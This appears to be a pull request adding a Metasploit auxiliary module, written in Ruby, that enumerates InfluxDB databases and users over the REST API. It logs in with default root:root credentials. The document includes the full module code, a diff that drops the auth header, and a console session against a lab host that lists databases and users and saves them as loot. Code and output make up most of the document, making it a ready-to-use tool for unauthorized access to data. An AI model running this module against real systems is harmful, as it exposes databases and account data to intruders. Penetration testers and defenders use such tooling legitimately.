### PR TITLE
Add Module for Enum on InfluxDB database.

### DIFF
--- a/modules/auxiliary/scanner/http/influxdb_enum.rb
+++ b/modules/auxiliary/scanner/http/influxdb_enum.rb
@@ -35,13 +35,9 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    username = datastore['USERNAME']
-    password = datastore['PASSWORD']
-
     res = send_request_cgi(
       'uri'           => normalize_uri(target_uri.path),
-      'method'        => 'GET',
-      'authorization' => basic_auth(username, password)
+      'method'        => 'GET'
     )
 
     if res && res.code == 401

--- a/modules/auxiliary/scanner/http/influxdb_enum.rb
+++ b/modules/auxiliary/scanner/http/influxdb_enum.rb
@@ -1,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'InfluxDB Enum Utility',
+      'Description'    => %q{
+        This module enumerates databases on InfluxDB using the REST API
+        (using default authentication - root:root).
+      },
+      'References'     =>
+        [
+          ['URL', 'http://influxdb.com/docs/v0.9/concepts/reading_and_writing_data.html']
+        ],
+      'Author'         => [ 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8086),
+        OptString.new('TARGETURI', [true, 'Path to list all the databases', '/db']),
+        OptString.new('USERNAME', [true, 'The username to login as', 'root']),
+        OptString.new('PASSWORD', [true, 'The password to login with', 'root'])
+      ], self.class)
+  end
+
+  def run
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    res = send_request_cgi(
+      'uri'           => normalize_uri(target_uri.path),
+      'method'        => 'GET',
+      'authorization' => basic_auth(username, password)
+    )
+
+    if res && res.code == 401
+      print_error("#{peer} - Failed to authenticate. Invalid username/password.")
+      return
+    end
+
+    if res.code == 200 && res.headers['X-Influxdb-Version'].include?('InfluxDB') && res.body.length > 0
+      print_status('Enumerating...')
+      begin
+        temp = JSON.parse(res.body)
+        results = JSON.pretty_generate(temp)
+      rescue JSON::ParserError
+        print_error('Unable to parse JSON data for the response.')
+      end
+
+      print_good("Found:\n\n#{results}\n")
+
+      path = store_loot(
+        'influxdb.enum',
+        'text/plain',
+        rhost,
+        results,
+        'InfluxDB Enum'
+      )
+
+      print_good("#{peer} - File saved in: #{path}")
+    else
+      print_error("#{peer} - Unable to enum, received \"#{res.code}\".")
+    end
+  rescue => e
+    print_error("#{peer} - The following Error was encountered: #{e.class}")
+  end
+end


### PR DESCRIPTION
#### Add InfluxDB Enumeration.

  Application: InfluxDB Database.
  Homepage: http://influxdb.com/
  References: http://influxdb.com/docs/v0.9/introduction/overview.html
#### Installation (Ubuntu 14.04.2 LTS 64bits)

```
  # for 64-bit systems
  $ wget http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb
  $ sudo dpkg -i influxdb_latest_amd64.deb

  or

  # for 32-bit systems
  $ wget http://s3.amazonaws.com/influxdb/influxdb_latest_i386.deb
  $ sudo dpkg -i influxdb_latest_i386.deb

  # Start the daemon
  $ sudo service influxdb start

  # Running
  $ sudo netstat -tupanlw | grep -i influxdb
  tcp6       0      0 :::8083                 :::*                    LISTEN      6557/influxdb   
  tcp6       0      0 :::8086                 :::*                    LISTEN      6557/influxdb   
  tcp6       0      0 :::8090                 :::*                    LISTEN      6557/influxdb   
  tcp6       0      0 :::8099                 :::*                    LISTEN      6557/influxdb   
```

   By default InfluxDB will use TCP ports 8083 and 8086 so these ports should be available on your system. 
#### Version*

  0.8.8
#### Usage:

```
msf > use auxiliary/scanner/http/influxdb_enum 
msf auxiliary(influxdb_enum) > show options 

Module options (auxiliary/scanner/http/influxdb_enum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   root             yes       The password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      8086             yes       The target port
   TARGETURI  /db              yes       Path to list all the databases
   USERNAME   root             yes       The username to login as
   VHOST                       no        HTTP server virtual host

msf auxiliary(influxdb_enum) > info

       Name: InfluxDB Enum Utility
     Module: auxiliary/scanner/http/influxdb_enum
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Roberto Soares Espreto <robertoespreto@gmail.com>

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   root             yes       The password to login with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      8086             yes       The target port
  TARGETURI  /db              yes       Path to list all the databases
  USERNAME   root             yes       The username to login as
  VHOST                       no        HTTP server virtual host

Description:
  This module enumerates databases on InfluxDB using the REST API 
  (with default authentication - root:root).

References:
  http://influxdb.com/docs/v0.9/concepts/reading_and_writing_data.html

msf auxiliary(influxdb_enum) > set RHOST 192.168.1.44
RHOST => 192.168.1.44
msf auxiliary(influxdb_enum) > run

[*] Enumerating...
[+] Found:

[
  {
    "name": "database_hackers"
  }
]

[+] 192.168.1.44:8086 - File saved in: /home/espreto/.msf4/loot/20150425042419_default_192.168.1.44_influxdb.enum_821239.txt
[*] Auxiliary module execution completed
msf auxiliary(influxdb_enum) > set TARGETURI /db/database_hackers/users
TARGETURI => /db/database_hackers/users
msf auxiliary(influxdb_enum) > run

[*] Enumerating...
[+] Found:

[
  {
    "name": "espreto",
    "isAdmin": false,
    "writeTo": ".*",
    "readFrom": ".*"
  },
  {
    "name": "administrator",
    "isAdmin": false,
    "writeTo": ".*",
    "readFrom": ".*"
  }
]

[+] 192.168.1.44:8086 - File saved in: /home/espreto/.msf4/loot/20150425043649_default_192.168.1.44_influxdb.enum_970642.txt
[*] Auxiliary module execution completed
msf auxiliary(influxdb_enum) >
```
